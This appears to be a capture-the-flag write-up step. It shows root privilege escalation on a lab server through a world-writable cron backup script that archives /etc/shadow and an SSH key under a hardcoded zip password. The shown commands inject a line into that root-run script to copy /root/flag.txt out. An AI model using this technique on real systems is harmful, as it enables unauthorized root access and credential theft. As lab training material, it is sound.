Great, now you have access to hackers command & control server.
But you probably need higher level access to find more valuable information.
Escalate privileges to root on command & control server at 10.XX.32.130
and read the flag from /root/flag.txt
Looking at the README, retrieved in C&C Access, reveals information about custom scheduled tasks via crontab.
#********************************************************#
# This share contains regular backups of our C&C server. #
#********************************************************#
Manual backups can be done by copying stuff to /share folder
For automated backups, specify a folder to back up in cronjob script.
/etc/crontab - Cron jobs
/etc/backup.sh - Backup script running every minute.
TO-DO!
DONE - B̶a̶c̶k̶u̶p̶ ̶p̶a̶s̶s̶w̶d̶ ̶a̶n̶d̶ ̶s̶h̶a̶d̶o̶w̶ ̶f̶i̶l̶e̶
DONE - P̶r̶o̶t̶e̶c̶t̶ ̶t̶h̶e̶ ̶c̶r̶e̶d̶z̶ ̶z̶i̶p̶ ̶f̶i̶l̶e̶ ̶w̶i̶t̶h̶ ̶p̶a̶s̶s̶w̶o̶r̶d̶
Set password to backup share!Indeed, there is a scheduled task /etc/backup.sh, defined in /etc/crontab, which is run by root user every minute.
max@command_control_SRV1:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /etc/backup.sh >/dev/null 2>&1
#
File /etc/backup.sh contains a script to create credz_backup.zip seen previously.
max@command_control_SRV1:~$ cat /etc/backup.sh
#!/bin/bash
# Back up the credentials for the system. Just in case max, change the passwords after initial testing
zip -e --password computer /share/credz_backup.zip -u /etc/passwd /etc/shadow /home/max/id_rsa
File /etc/backup.sh is world-writable, meaning it can be modified by anybody.
max@command_control_SRV1:~$ ls -al /etc/backup.sh
-rwxrw-rw- 1 root root 211 Oct 24 11:42 /etc/backup.sh
Append commands to /etc/backup.sh to make a copy of the flag.
max@command_control_SRV1:~$ echo >> /etc/backup.sh
max@command_control_SRV1:~$ echo "cat /root/flag.txt > /tmp/flag; chmod 777 /tmp/flag" >> /etc/backup.sh
Wait a minute for crontab to execute /etc/backup.sh and read the flag from /tmp/flag.